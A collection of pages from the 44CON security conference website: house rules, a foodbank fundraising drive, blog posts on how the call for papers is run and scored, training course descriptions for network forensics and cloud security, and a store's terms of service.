          #####EOF##### 44CON House Rules – 44CON

          44CON House Rules

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours;

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          #####EOF##### Making Britain a Better Place For The Most Vulnerable – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          #####EOF##### howto – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          #####EOF##### 44CON 2017 – 44CON

          44CON 2017 Schedule Available.

          Here you go folks the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things the schedule could be subject to some last minute changes so make sure you keep an eye out on the day so you don’t miss out.

          If you have’t got your ticket yet there are some still available here.

          We look forward to seeing you all in September.

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past  10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as  Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          44CON 2017 Sponsorship Opportunities Available

          44CON 2017, now in its seventh successful year, is recognised as a “must-attend” conference for security professionals. Offering unparalleled networking, cutting-edge presentations and thought leadership across the information security arena, we aim to ensure attendees have a great time. This year we had over 400 people attend, that added with speakers from across the world delivering awesome talks on relevant and up to date topics makes 44CON one of the UK’s premier conferences.

          44CON 2017 will take place from the 13th – 15th September 2017 at the ILEC Conference Centre, London. There will also be a number of training courses taking place before 44CON 2017. If you have a training proposal you wish us to consider, please email emma@44con.com for more information.

          If you wish to become one of our awesome sponsors, then please take a look at our 44CON 2017 sponsor pack. If you have any questions or want to discuss any of the opportunities further please email sponsorops@44con.com

           

          #####EOF##### DSC_5096-1 – 44CON

          DSC_5096-1

          #####EOF##### Cloud Security and DevSecOps Workshop – 44CON

          Cloud Security and DevSecOps Workshop

          Presented By: Paul Schwarzenberger

          Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

          Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

          This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated to continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Knowledge of AWS and Azure services, secure architectures and best practice
          • Hands-on experience of AWS and Azure security features and services
          • Understanding DevSecOps approaches, technologies and tools
          • Practical use of CI/CD pipelines incorporating security testing
          • Container and serverless architectures, security issues and controls

          Course Outline

          Day 1:

          • Introduction and cloud concepts
          • AWS core services
          • AWS lab – build serverless web site using CloudFormation template
          • AWS security services
          • Azure core services
          • Azure lab – deploy infrastructure and implement security improvements

          Day 2:

          • Azure security services
          • Continuous compliance and automated assessment tools
          • Continuous compliance lab – assess security of an AWS account
          • Container concepts, architectures and container security
          • Serverless architectures, serverless functions, security risks and best practice
          • DevOps and DevSecOps
          • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

          Target Audience

          Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

          Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

          Student Requirements

          No particular experience required, however any knowledge of cloud will be beneficial.

          What to Bring

          • Laptop with Amazon Workspaces client installed (see below)
          • Mobile phone (for authenticator app)

          Software Requirements

          Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

          After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

           

           

           

           

           

           

           

          Also please install the Google Authenticator app on your smartphone.

          Students will be provided with

          Amazon Workspaces virtual desktops for the labs, with all necessary software and tools preinstalled

          AWS, Azure and GitHub credentials to be used responsibly during the course

          Electronic copies of the course presentations, electronic and paper copies of lab guides

          About the Trainer

          Instructor – Paul Schwarzenberger @paulschwarzen

          Paul is a cloud security architect and DevSecOps specialist with over 15 years experience leading a wide range of security related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.  

Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

          Recent conference presentations include:

          • Security BSides London 2018 – How to take over a production system in the cloud
          • DevSecCon London 2018 – A journey to continuous cloud compliance
          • IISP CrestCON 2018 – Why cloud security is different

          Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

          Book your 44CON June 2019 training course now!

          #####EOF##### Terms of Service | Sense/Net

          OVERVIEW

           

          This website is operated by Sense/Net Ltd, 34 Westway, Caterham on the Hill, Surrey CR3 5TP, United Kingdom (registered in England, No: 07620524). Throughout the site, the terms “we”, “us” and “our” refer to Sense/Net Ltd. Our VAT number is GB 16 0558 37 990. Sense/Net Ltd offers this website, including all information, tools and services available from this site to you, the user, conditioned upon your acceptance of all terms, conditions, policies and notices stated here. 

           

          By visiting our site and/ or purchasing something from us, you engage in our “Service” and agree to be bound by the following terms and conditions (“Terms of Service”, “Terms”), including those additional terms and conditions and policies referenced herein and/or available by hyperlink. These Terms of Service apply  to all users of the site, including without limitation users who are browsers, vendors, customers, merchants, and/ or contributors of content.

           

          Please read these Terms of Service carefully before accessing or using our website. By accessing or using any part of the site, you agree to be bound by these Terms of Service. If you do not agree to all the terms and conditions of this agreement, then you may not access the website or use any services. If these Terms of Service are considered an offer, acceptance is expressly limited to these Terms of Service. 

           

          Any new features or tools which are added to the current store shall also be subject to the Terms of Service. You can review the most current version of the Terms of Service at any time on this page. We reserve the right to update, change or replace any part of these Terms of Service by posting updates and/or changes to our website. It is your responsibility to check this page periodically for changes. Your continued use of or access to the website following the posting of any changes constitutes acceptance of those changes.

           

          Our store is hosted on Shopify Inc. They provide us with the online e-commerce platform that allows us to sell our products and services to you. 

           

          SECTION 1 - ONLINE STORE TERMS

           

          By agreeing to these Terms of Service, you represent that you are at least the age of majority in your state or province of residence, or that you are the age of majority in your state or province of residence and you have given us your consent to allow any of your minor dependents to use this site. 

          You may not use our products for any illegal or unauthorized purpose nor may you, in the use of the Service, violate any laws in your jurisdiction (including but not limited to copyright laws).

          You must not transmit any worms or viruses or any code of a destructive nature.

          A breach or violation of any of the Terms will result in an immediate termination of your Services.

           

          SECTION 2 - GENERAL CONDITIONS

           

          We reserve the right to refuse service to anyone for any reason at any time.

          You understand that your content (not including credit card information), may be transferred unencrypted and involve (a) transmissions over various networks; and (b) changes to conform and adapt to technical requirements of connecting networks or devices. Credit card information is always encrypted during transfer over networks.

          You agree not to reproduce, duplicate, copy, sell, resell or exploit any portion of the Service, use of the Service, or access to the Service or any contact on the website through which the service is provided, without express written permission by us.

          The headings used in this agreement are included for convenience only and will not limit or otherwise affect these Terms.

           

          SECTION 3 - ACCURACY, COMPLETENESS AND TIMELINESS OF INFORMATION 

           

          We are not responsible if information made available on this site is not accurate, complete or current. The material on this site is provided for general information only and should not be relied upon or used as the sole basis for making decisions without consulting primary, more accurate, more complete or more timely sources of information. Any reliance on the material on this site is at your own risk. 

          This site may contain certain historical information. Historical information, necessarily, is not current and is provided for your reference only. We reserve the right to modify the contents of this site at any time, but we have no obligation to update any information on our site. You agree that it is your responsibility to monitor changes to our site.

           

          SECTION 4 - MODIFICATIONS TO THE SERVICE AND PRICES

           

          Prices for our products are subject to change without notice.

          We reserve the right at any time to modify or discontinue the Service (or any part or content thereof) without notice at any time.

          We shall not be liable to you or to any third-party for any modification, price change, suspension or discontinuance of the Service.

          The total price is inclusive of any applicable value added tax.

           

          SECTION 5 - PRODUCTS OR SERVICES (if applicable)

           

          Certain products or services may be available exclusively online through the website. These products or services may have limited quantities and are subject to return or exchange only according to our Return Policy.

          We have made every effort to display as accurately as possible the colors and images of our products that appear at the store. We cannot guarantee that your computer monitor's display of any color will be accurate.

          We reserve the right, but are not obligated, to limit the sales of our products or Services to any person, geographic region or jurisdiction. We may exercise this right on a case-by-case basis. We reserve the right to limit the quantities of any products or services that we offer. All descriptions of products or product pricing are subject to change at anytime without notice, at the sole discretion of us. We reserve the right to discontinue any product at any time. Any offer for any product or service made on this site is void where prohibited.

          We do not warrant that the quality of any products, services, information, or other material purchased or obtained by you will meet your expectations, or that any errors in the Service will be corrected.

           

          SECTION 6 - ACCURACY OF BILLING AND ACCOUNT INFORMATION

           

          We reserve the right to refuse any order you place with us. We may, in our sole discretion, limit or cancel quantities purchased per person, per household or per order. These restrictions may include orders placed by or under the same customer account, the same credit card, and/or orders that use the same billing and/or shipping address. In the event that we make a change to or cancel an order, we may attempt to notify you by contacting the e-mail and/or billing address/phone number provided at the time the order was made. We reserve the right to limit or prohibit orders that, in our sole judgment, appear to be placed by dealers, resellers or distributors.

           

          You agree to provide current, complete and accurate purchase and account information for all purchases made at our store. You agree to promptly update your account and other information, including your email address and credit card numbers and expiration dates, so that we can complete your transactions and contact you as needed.

           

          For more detail, please review our Returns Policy.

           

          SECTION 7 - OPTIONAL TOOLS

           

          We may provide you with access to third-party tools over which we neither monitor nor have any control nor input.

          You acknowledge and agree that we provide access to such tools ”as is” and “as available” without any warranties, representations or conditions of any kind and without any endorsement. We shall have no liability whatsoever arising from or relating to your use of optional third-party tools.

          Any use by you of optional tools offered through the site is entirely at your own risk and discretion and you should ensure that you are familiar with and approve of the terms on which tools are provided by the relevant third-party provider(s).

          We may also, in the future, offer new services and/or features through the website (including, the release of new tools and resources). Such new features and/or services shall also be subject to these Terms of Service.

           

          SECTION 8 - THIRD-PARTY LINKS

           

          Certain content, products and services available via our Service may include materials from third-parties.

          Third-party links on this site may direct you to third-party websites that are not affiliated with us. We are not responsible for examining or evaluating the content or accuracy and we do not warrant and will not have any liability or responsibility for any third-party materials or websites, or for any other materials, products, or services of third-parties.

          We are not liable for any harm or damages related to the purchase or use of goods, services, resources, content, or any other transactions made in connection with any third-party websites. Please review carefully the third-party's policies and practices and make sure you understand them before you engage in any transaction. Complaints, claims, concerns, or questions regarding third-party products should be directed to the third-party.

           

          SECTION 9 - USER COMMENTS, FEEDBACK AND OTHER SUBMISSIONS

           

          If, at our request, you send certain specific submissions (for example contest entries) or without a request from us you send creative ideas, suggestions, proposals, plans, or other materials, whether online, by email, by postal mail, or otherwise (collectively, 'comments'), you agree that we may, at any time, without restriction, edit, copy, publish, distribute, translate and otherwise use in any medium any comments that you forward to us. We are and shall be under no obligation (1) to maintain any comments in confidence; (2) to pay compensation for any comments; or (3) to respond to any comments. 

          We may, but have no obligation to, monitor, edit or remove content that we determine in our sole discretion are unlawful, offensive, threatening, libelous, defamatory, pornographic, obscene or otherwise objectionable or violates any party’s intellectual property or these Terms of Service.

          You agree that your comments will not violate any right of any third-party, including copyright, trademark, privacy, personality or other personal or proprietary right. You further agree that your comments will not contain libelous or otherwise unlawful, abusive or obscene material, or contain any computer virus or other malware that could in any way affect the operation of the Service or any related website. You may not use a false e-mail address, pretend to be someone other than yourself, or otherwise mislead us or third-parties as to the origin of any comments. You are solely responsible for any comments you make and their accuracy. We take no responsibility and assume no liability for any comments posted by you or any third-party.

           

          SECTION 10 - PERSONAL INFORMATION

           

          Your submission of personal information through the store is governed by our Privacy Policy. To view our Privacy Policy.

           

          SECTION 11 - ERRORS, INACCURACIES AND OMISSIONS

           

          Occasionally there may be information on our site or in the Service that contains typographical errors, inaccuracies or omissions that may relate to product descriptions, pricing, promotions, offers, product shipping charges, transit times and availability. We reserve the right to correct any errors, inaccuracies or omissions, and to change or update information or cancel orders if any information in the Service or on any related website is inaccurate at any time without prior notice (including after you have submitted your order).

          We undertake no obligation to update, amend or clarify information in the Service or on any related website, including without limitation, pricing information, except as required by law. No specified update or refresh date applied in the Service or on any related website, should be taken to indicate that all information in the Service or on any related website has been modified or updated. 

           

          SECTION 12 - PROHIBITED USES

           

          In addition to other prohibitions as set forth in the Terms of Service, you are prohibited from using the site or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.

           

          SECTION 13 - DISCLAIMER OF WARRANTIES; LIMITATION OF LIABILITY

           

          We do not guarantee, represent or warrant that your use of our service will be uninterrupted, timely, secure or error-free. 

          We do not warrant that the results that may be obtained from the use of the service will be accurate or reliable. 

          You agree that from time to time we may remove the service for indefinite periods of time or cancel the service at any time, without notice to you.

          You expressly agree that your use of, or inability to use, the service is at your sole risk. The service and all products and services delivered to you through the service are (except as expressly stated by us) provided 'as is' and 'as available' for your use, without any representation, warranties or conditions of any kind, either express or implied, including all implied warranties or conditions of merchantability, merchantable quality, fitness for a particular purpose, durability, title, and non-infringement.

          In no case shall 44CON, our directors, officers, employees, affiliates, agents, contractors, interns, suppliers, service providers or licensors be liable for any injury, loss, claim, or any direct, indirect, incidental, punitive, special, or consequential damages of any kind, including, without limitation lost profits, lost revenue, lost savings, loss of data, replacement costs, or any similar damages, whether based in contract, tort (including negligence), strict liability or otherwise, arising from your use of any of the service or any products procured using the service, or for any other claim related in any way to your use of the service or any product, including, but not limited to, any errors or omissions in any content, or any loss or damage of any kind incurred as a result of the use of the service or any content (or product) posted, transmitted, or otherwise made available via the service, even if advised of their possibility. Because some states or jurisdictions do not allow the exclusion or the limitation of liability for consequential or incidental damages, in such states or jurisdictions, our liability shall be limited to the maximum extent permitted by law.

           

          SECTION 14 - INDEMNIFICATION

           

          You agree to indemnify, defend and hold harmless 44CON and our parent, subsidiaries, affiliates, partners, officers, directors, agents, contractors, licensors, service providers, subcontractors, suppliers, interns and employees, harmless from any claim or demand, including reasonable attorneys’ fees, made by any third-party due to or arising out of your breach of these Terms of Service or the documents they incorporate by reference, or your violation of any law or the rights of a third-party.

           

          SECTION 15 - SEVERABILITY

           

          In the event that any provision of these Terms of Service is determined to be unlawful, void or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from these Terms of Service, such determination shall not affect the validity and enforceability of any other remaining provisions.

           

          SECTION 16 - TERMINATION

           

          The obligations and liabilities of the parties incurred prior to the termination date shall survive the termination of this agreement for all purposes.

          These Terms of Service are effective unless and until terminated by either you or us. You may terminate these Terms of Service at any time by notifying us that you no longer wish to use our Services, or when you cease using our site.

          If in our sole judgment you fail, or we suspect that you have failed, to comply with any term or provision of these Terms of Service, we also may terminate this agreement at any time without notice and you will remain liable for all amounts due up to and including the date of termination; and/or accordingly may deny you access to our Services (or any part thereof).

           

          SECTION 17 - ENTIRE AGREEMENT

           

          The failure of us to exercise or enforce any right or provision of these Terms of Service shall not constitute a waiver of such right or provision. 

          These Terms of Service and any policies or operating rules posted by us on this site or in respect to The Service constitutes the entire agreement and understanding between you and us and govern your use of the Service, superseding any prior or contemporaneous agreements, communications and proposals, whether oral or written, between you and us (including, but not limited to, any prior versions of the Terms of Service).

          Any ambiguities in the interpretation of these Terms of Service shall not be construed against the drafting party.

           

          SECTION 18 - GOVERNING LAW

           

          These Terms of Service and any separate agreements whereby we provide you Services shall be governed by and construed in accordance with the laws of England and any dispute shall be finally resolved by the English courts.

           

